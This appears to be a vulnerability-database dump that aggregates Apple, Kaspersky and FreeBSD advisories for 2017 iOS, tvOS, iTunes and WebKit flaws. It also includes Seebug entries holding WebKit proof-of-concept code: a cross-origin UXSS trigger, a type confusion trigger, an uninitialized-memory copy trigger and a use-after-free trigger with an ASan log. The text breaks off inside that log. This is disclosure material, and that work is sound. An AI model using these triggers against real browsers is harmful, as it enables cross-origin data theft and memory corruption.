Apple TV (4th generation)\n\nImpact: An attacker in Wi-Fi range may be able to cause a denial of service on the Wi-Fi chip\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2017-7066: Gal Beniamini of Google Project Zero\n\nEntry added September 26, 2017\n\n**Wi-Fi**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-9417: Nitay Artenstein of Exodus Intelligence\n", "edition": 2, "modified": "2017-09-26T09:38:24", "published": "2017-09-26T09:38:24", "id": "APPLE:HT207924", 
"href": "https://support.apple.com/kb/HT207924", "title": "About the security content of tvOS 10.2.2 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:09", "bulletinFamily": "software", "cvelist": ["CVE-2017-7063", "CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7062", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-8248", "CVE-2017-7008", "CVE-2017-7038", "CVE-2017-7026", "CVE-2017-7056", "CVE-2017-7024", "CVE-2017-7055", "CVE-2017-7022", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7060", "CVE-2017-9417", "CVE-2017-7007", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7029", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7023", "CVE-2017-7066", "CVE-2017-7028", "CVE-2017-7058", "CVE-2017-7025", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7069", "CVE-2017-2517", "CVE-2017-7009", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7059", "CVE-2017-7065", "CVE-2017-7047", "CVE-2017-7068", "CVE-2017-7030", "CVE-2017-7041", "CVE-2017-7027"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 10.3.3\n\nReleased July 19, 2017\n\n**Contacts**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-7062: Shashank (@cyberboyIndia)\n\n**CoreAudio**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted movie file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved bounds checking.\n\nCVE-2017-7008: Yangkang (@dnpushme) of Qihoo 360 Qex Team\n\n**EventKitUI**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: A remote attacker may cause an unexpected application termination\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-7007: Jos\u00e9 Antonio Esteban (@Erratum_) of Sapsi Consultores\n\n**IOUSBFamily**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7009: shrek_wzw of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory 
handling.\n\nCVE-2017-7022: an anonymous researcher\n\nCVE-2017-7024: an anonymous researcher\n\nCVE-2017-7026: an anonymous researcher\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7023: an anonymous researcher\n\nCVE-2017-7025: an anonymous researcher\n\nCVE-2017-7027: an anonymous researcher\n\nCVE-2017-7069: Proteas of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-7028: an anonymous researcher\n\nCVE-2017-7029: an anonymous researcher\n\n**libarchive**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: Unpacking a maliciously crafted archive may lead to arbitrary code execution\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-7068: found by OSS-Fuzz\n\n**libxml2**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: Parsing a maliciously crafted XML document may lead to disclosure of user information\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-7010: Apple\n\nCVE-2017-7013: found by OSS-Fuzz\n\n**libxpc**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7047: Ian Beer of Google Project Zero\n\n**Messages**\n\nAvailable for: 
iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: A remote attacker may cause an unexpected application termination\n\nDescription: A memory consumption issue was addressed through improved memory handling.\n\nCVE-2017-7063: Shashank (@cyberboyIndia)\n\n**Notifications**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: Notifications may appear on the lock screen when disabled\n\nDescription: A lock screen issue was addressed with improved state management.\n\nCVE-2017-7058: Beyza Sevin\u00e7 of S\u00fcleyman Demirel \u00dcniversitesi\n\nEntry updated July 28, 2017\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-2517: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Printing**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: Processing maliciously crafted web content may lead to an infinite number of print dialogs\n\nDescription: An issue existed where a malicious or compromised website could show infinite print dialogs and make users believe their browser was locked. 
The issue was addressed through throttling of print dialogs.\n\nCVE-2017-7060: Travis Kelley of City of Mishawaka, Indiana\n\n**Telephony**\n\nAvailable for: iPhone 5 and later, and Wi-Fi + Cellular models of iPad 4th generation and later\n\nImpact: An attacker in a privileged network position may be able to execute arbitrary code\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-8248\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: Processing maliciously crafted web content may allow cross-origin data to be exfiltrated by using SVG filters to conduct a timing side-channel attack. This issue was addressed by not painting the cross-origin buffer into the frame that gets filtered.\n\nCVE-2017-7006: an anonymous researcher, David Kohlbrenner of UC San Diego\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed with improved frame handling.\n\nCVE-2017-7011: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7018: lokihardt of Google Project Zero\n\nCVE-2017-7020: likemeng of Baidu Security Lab\n\nCVE-2017-7030: chenqin of Ant-financial Light-Year Security Lab (\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7034: chenqin of Ant-financial Light-Year Security Lab 
(\u8682\u8681\u91d1\u670d\u5df4\u65af\u5149\u5e74\u5b89\u5168\u5b9e\u9a8c\u5ba4)\n\nCVE-2017-7037: lokihardt of Google Project Zero\n\nCVE-2017-7039: Ivan Fratric of Google Project Zero\n\nCVE-2017-7040: Ivan Fratric of Google Project Zero\n\nCVE-2017-7041: Ivan Fratric of Google Project Zero\n\nCVE-2017-7042: Ivan Fratric of Google Project Zero\n\nCVE-2017-7043: Ivan Fratric of Google Project Zero\n\nCVE-2017-7046: Ivan Fratric of Google Project Zero\n\nCVE-2017-7048: Ivan Fratric of Google Project Zero\n\nCVE-2017-7052: cc working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7055: The UK's National Cyber Security Centre (NCSC)\n\nCVE-2017-7056: lokihardt of Google Project Zero\n\nCVE-2017-7061: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content with DOMParser may lead to cross site scripting\n\nDescription: A logic issue existed in the handling of DOMParser. 
This issue was addressed with improved state management.\n\nCVE-2017-7038: Egor Karbutov (@ShikariSenpai) of Digital Security and Egor Saltykov (@ansjdnakjdnajkd) of Digital Security, Neil Jenkins of FastMail Pty Ltd\n\nCVE-2017-7059: Masato Kinugawa and Mario Heiderich of Cure53\n\nEntry updated July 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7049: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A memory initialization issue was addressed through improved memory handling.\n\nCVE-2017-7064: lokihardt of Google Project Zero\n\n**WebKit Page Loading**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7019: Zhiyang Zeng of Tencent Security Platform Department\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation \n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7012: Apple\n\n**Wi-Fi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip\n\nDescription: A memory corruption issue was addressed with improved memory 
handling.\n\nCVE-2017-7065: Gal Beniamini of Google Project Zero\n\nEntry added September 25, 2017\n\n**Wi-Fi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: An attacker in Wi-Fi range may be able to cause a denial of service on the Wi-Fi chip\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2017-7066: Gal Beniamini of Google Project Zero\n\nEntry added September 26, 2017\n\n**Wi-Fi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-9417: Nitay Artenstein of Exodus Intelligence\n", "edition": 3, "modified": "2020-07-27T08:16:12", "published": "2020-07-27T08:16:12", "id": "APPLE:HT207923", "href": "https://support.apple.com/kb/HT207923", "title": "About the security content of iOS 10.3.3 - Apple Support", "type": "apple", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:49:27", "bulletinFamily": "info", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7013", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7053", "CVE-2017-7037", "CVE-2017-7010", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7030", "CVE-2017-7041"], "description": "### *Detect date*:\n07/19/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Apple iTunes. 
Malicious users can exploit these vulnerabilities to execute arbitrary code and obtain sensitive information.\n\n### *Affected products*:\nApple iTunes versions earlier than 12.6.2\n\n### *Solution*:\nUpdate to the latest version \n[Download iTunes](<https://www.apple.com/itunes/download/>)\n\n### *Original advisories*:\n[Apple security bulletin](<https://support.apple.com/en-us/HT207928>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apple iTunes](<https://threats.kaspersky.com/en/product/Apple-iTunes/>)\n\n### *CVE-IDS*:\n[CVE-2017-7041](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7041>)9.3Critical \n[CVE-2017-7042](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7042>)9.3Critical \n[CVE-2017-7043](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7043>)6.8High \n[CVE-2017-7046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7046>)6.8High \n[CVE-2017-7048](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7048>)6.8High \n[CVE-2017-7049](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7049>)7.5Critical \n[CVE-2017-7052](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7052>)7.5Critical \n[CVE-2017-7053](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7053>)9.3Critical \n[CVE-2017-7055](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7055>)7.5Critical \n[CVE-2017-7056](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7056>)7.5Critical \n[CVE-2017-7061](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7061>)7.5Critical \n[CVE-2017-7064](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7064>)4.3Warning \n[CVE-2017-7010](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7010>)6.8High \n[CVE-2017-7012](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7012>)6.8High \n[CVE-2017-7013](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7013>)6.8High \n[CVE-2017-7018](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7018>)6.8High 
\n[CVE-2017-7019](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7019>)6.8High \n[CVE-2017-7020](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7020>)6.8High \n[CVE-2017-7030](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7030>)6.8High \n[CVE-2017-7034](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7034>)6.8High \n[CVE-2017-7037](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7037>)6.8High \n[CVE-2017-7039](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7039>)6.8High \n[CVE-2017-7040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7040>)6.8High\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 45, "modified": "2020-06-18T00:00:00", "published": "2017-07-19T00:00:00", "id": "KLA11075", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11075", "title": "\r KLA11075Multiple vulnerabilities in Apple iTunes ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:14", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7034", "CVE-2017-7043", "CVE-2017-7064", "CVE-2017-7020", "CVE-2017-7038", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7042", "CVE-2017-7049", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7012", "CVE-2017-7019", "CVE-2017-7040", "CVE-2017-7011", "CVE-2017-7006", "CVE-2017-7059", "CVE-2017-7030", "CVE-2017-7041"], "description": "\nThe Webkit gtk team reports:\n\nPlease reference CVE/URL list for details\n\n", "edition": 6, "modified": "2018-03-28T00:00:00", "published": "2017-07-24T00:00:00", "id": "0F66B901-715C-11E7-AD1F-BCAEC565249C", "href": "https://vuxml.freebsd.org/freebsd/0f66b901-715c-11e7-ad1f-bcaec565249c.html", "title": "webkit2-gtk3 -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": 
[{"lastseen": "2017-11-19T11:56:35", "description": "JSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype. So JSDOMWindow::getPrototype which checks the Same Origin Policy is not called.\r\n\r\nThe PoC shows to call a setter of another origin's object.\r\n\r\n### PoC 1 - JSValue::putToPrimitive:\r\n```\r\n<body>\r\n<script>\r\n\r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet loc = f.contentWindow.location;\r\nf.onload = () => {\r\n let a = 1.2;\r\n a.__proto__.__proto__ = f.contentWindow;\r\n\r\n a['test'] = {toString: function () {\r\n arguments.callee.caller.constructor('alert(location)')();\r\n }};\r\n};\r\nf.src = 'data:text/html,' + `<iframe></iframe><script>\r\nObject.prototype.__defineSetter__('test', v => {\r\n 'a' + v;\r\n});\r\n\r\n</scrip` + `t>`;\r\n\r\n</script>\r\n</body>\r\n```\r\n\r\n### PoC 2 - JSObject::putInlineSlow:\r\n```\r\n<body>\r\n<script>\r\n\r\nlet f = document.body.appendChild(document.createElement('iframe'));\r\nlet loc = f.contentWindow.location;\r\nf.onload = () => {\r\n let a = {\r\n __proto__: f.contentWindow\r\n };\r\n\r\n a['test'] = {toString: function () {\r\n arguments.callee.caller.constructor('alert(location)')();\r\n }};\r\n};\r\nf.src = 'data:text/html,' + `<iframe></iframe><script>\r\nObject.prototype.__defineSetter__('test', v => {\r\n 'a' + v;\r\n});\r\n\r\n</scrip` + `t>`;\r\n</script>\r\n</body>\r\n```", "published": "2017-07-27T00:00:00", "type": "seebug", "title": "WebKit: JSC: UXSS via JSObject::putInlineSlow and JSValue::putToPrimitive(CVE-2017-7037)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7037"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96298", "id": "SSV:96298", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:15:17", "description": "Let's start 
with JS code.\r\n```\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n o[i]; <<-------- (a)\r\n}\r\n```\r\nWhen the code generator meets (a), it will call BytecodeGenerator::emitGetByVal.\r\n\r\nHere's the code of BytecodeGenerator::emitGetByVal.\r\n```\r\nRegisterID* BytecodeGenerator::emitGetByVal(RegisterID* dst, RegisterID* base, RegisterID* property)\r\n{\r\n for (size_t i = m_forInContextStack.size(); i > 0; i--) {\r\n ForInContext& context = m_forInContextStack[i - 1].get();\r\n if (context.local() != property)\r\n continue;\r\n\r\n if (!context.isValid())\r\n break;\r\n\r\n if (context.type() == ForInContext::IndexedForInContextType) {\r\n property = static_cast<IndexedForInContext&>(context).index();\r\n break;\r\n }\r\n\r\n ASSERT(context.type() == ForInContext::StructureForInContextType);\r\n StructureForInContext& structureContext = static_cast<StructureForInContext&>(context);\r\n UnlinkedValueProfile profile = emitProfiledOpcode(op_get_direct_pname);\r\n instructions().append(kill(dst));\r\n instructions().append(base->index());\r\n instructions().append(property->index());\r\n instructions().append(structureContext.index()->index());\r\n instructions().append(structureContext.enumerator()->index());\r\n instructions().append(profile);\r\n return dst;\r\n }\r\n\r\n UnlinkedArrayProfile arrayProfile = newArrayProfile();\r\n UnlinkedValueProfile profile = emitProfiledOpcode(op_get_by_val);\r\n instructions().append(kill(dst));\r\n instructions().append(base->index());\r\n instructions().append(property->index());\r\n instructions().append(arrayProfile);\r\n instructions().append(profile);\r\n return dst;\r\n}\r\n```\r\nThe method uses op_get_by_val to handle expressions like \"o[i]\". But, there is a fast path, which uses op_get_direct_pname, for when the index variable is a string. op_get_direct_pname is designed for a string index only. So if other types are used as indexes, it will cause type confusions. 
In the above JS code, it's very clear that \"i\" will be a string (\"xx\") semantically. Therefore, it will use op_get_direct_pname to handle it.\r\n\r\nHere's another example.\r\n```\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n o[i]; <<-------- (a)\r\n i = 0x123456; <<-------- (b)\r\n o[i]; <<-------- (c)\r\n}\r\n```\r\nIn this case, it will use op_get_direct_pname at (a). And at (b), since the index variable \"i\" is replaced, the ForInContext object's invalidate method is called, which makes \"context.isValid()\" return false. So, op_get_by_val will be used at (c).\r\n\r\nBut the problem is that it can't properly handle the following case, which causes a type confusion.\r\n```\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n for (let j = 0; j < 2; j++) {\r\n o[i]; // When j == 1, op_get_direct_pname was already emitted, but i is not a string anymore.\r\n i = 0;\r\n }\r\n}\r\n```\r\n### PoC:\r\n```\r\nlet o = {};\r\nfor (let i in {xx: 0}) {\r\n for (let j = 0; j < 2; j++) {\r\n o[i];\r\n i = new Uint32Array([0, 1, 0x777777, 0, 0]);\r\n }\r\n}\r\n```", "published": "2017-10-10T00:00:00", "type": "seebug", "title": "WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal(CVE-2017-7061)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7061"], "modified": "2017-10-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96629", "id": "SSV:96629", "sourceData": "\n let o = {};\r\nfor (let i in {xx: 0}) {\r\n for (let j = 0; j < 2; j++) {\r\n o[i];\r\n i = new Uint32Array([0, 1, 0x777777, 0, 0]);\r\n }\r\n}\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-96629"}, {"lastseen": "2017-11-19T11:56:46", "description": "WebKit: JSC: JSArray::appendMemcpy uninitialized memory copy\r\n\r\nHere's a snippet of `JSArray::appendMemcpy`.\r\n```\r\nbool JSArray::appendMemcpy(ExecState* exec, VM& vm, unsigned startIndex, JSC::JSArray* otherArray)\r\n{\r\n auto 
scope = DECLARE_THROW_SCOPE(vm);\r\n\r\n if (!canFastCopy(vm, otherArray))\r\n return false;\r\n\r\n IndexingType type = indexingType();\r\n IndexingType copyType = mergeIndexingTypeForCopying(otherArray->indexingType());\r\n if (type == ArrayWithUndecided && copyType != NonArray) {\r\n if (copyType == ArrayWithInt32)\r\n convertUndecidedToInt32(vm);\r\n else if (copyType == ArrayWithDouble)\r\n convertUndecidedToDouble(vm);\r\n else if (copyType == ArrayWithContiguous)\r\n convertUndecidedToContiguous(vm);\r\n else {\r\n ASSERT(copyType == ArrayWithUndecided);\r\n return true;\r\n }\r\n } else if (type != copyType)\r\n return false;\r\n\r\n ...\r\n\r\n if (type == ArrayWithDouble)\r\n memcpy(butterfly()->contiguousDouble().data() + startIndex, otherArray->butterfly()->contiguousDouble().data(), sizeof(JSValue) * otherLength);\r\n else\r\n memcpy(butterfly()->contiguous().data() + startIndex, otherArray->butterfly()->contiguous().data(), sizeof(JSValue) * otherLength);\r\n\r\n return true;\r\n}\r\n```\r\n\r\nThe method considers the case where |this|'s type is ArrayWithUndecided, but does not consider the case where |otherArray|'s type is ArrayWithUndecided, in which case its storage may hold uninitialized data.\r\nSo, when the memcpy function is called, |otherArray|'s uninitialized memory may be copied to |this|, which has a concrete type.\r\n\r\n### PoC:\r\n```\r\nfunction optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();\r\n```", "published": "2017-07-27T00:00:00", "type": "seebug", "title": "WebKit: JSC: JSArray::appendMemcpy uninitialized memory 
copy(CVE-2017-7064)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7064"], "modified": "2017-07-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96302", "id": "SSV:96302", "sourceData": "\n function optNewArrayAndConcat() {\r\n let a = [,,,,,,,,,];\r\n return Array.prototype.concat.apply(a);\r\n}\r\n\r\nfunction main() {\r\n Array.prototype.constructor = {\r\n [Symbol.species]: function () {\r\n return [{}];\r\n }\r\n };\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x10000; i++) {\r\n optNewArrayAndConcat().fill({});\r\n }\r\n\r\n gc();\r\n\r\n for (let i = 0; i < 0x20000; i++) {\r\n let res = optNewArrayAndConcat();\r\n if (res[0])\r\n print(res.toString());\r\n }\r\n}\r\n\r\nmain();\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96302", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T11:56:43", "description": "There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on an ASan build of WebKit nightly.\r\n\r\nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). 
On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.\r\n\r\n### PoC:\r\n\r\n=================================================================\r\n```\r\n<script>\r\nfunction go() {\r\n li.hidden = true;\r\n dir.setAttribute(\"aria-labeledby\", \"map\");\r\n}\r\n</script>\r\n<body onload=go()>\r\n<dir id=\"dir\">\r\n<li id=\"li\">\r\n<map id=\"map\">\r\n<area></area>\r\n```\r\n=================================================================\r\n\r\n### ASan log:\r\n```\r\n=================================================================\r\n==728==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000908a0 at pc 0x000109f2cbb5 bp 0x7fff5e08a430 sp 0x7fff5e08a428\r\nREAD of size 8 at 0x6080000908a0 thread T0\r\n==728==WARNING: invalid path to external symbolizer!\r\n==728==WARNING: Failed to use and restart external symbolizer!\r\n #0 0x109f2cbb4 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4)\r\n #1 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)\r\n #2 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)\r\n #3 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)\r\n #4 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const 
